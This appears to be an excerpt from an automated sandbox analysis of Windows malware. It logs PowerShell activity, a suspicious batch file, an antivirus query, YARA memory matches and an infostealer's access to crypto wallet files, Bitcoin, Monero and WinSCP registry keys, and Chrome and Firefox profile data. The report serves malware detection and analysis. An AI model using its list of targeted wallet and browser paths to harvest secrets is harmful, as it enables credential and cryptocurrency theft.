Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9494D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle, 3_2_00007FF79E9494D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93E220 GetSystemTimePreciseAsFileTime, 3_2_00007FF79E93E220
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: OpenWith.exe, 0000000B.00000003.1624543124.000001BD875A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Electrum\config
Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8758D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ty.jaxx
Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus
Source: OpenWith.exe, 0000000B.00000003.1636222676.000001BD88055000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sk\AppData\Roaming\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000001.00000002.1559772878.00007FFAAC630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
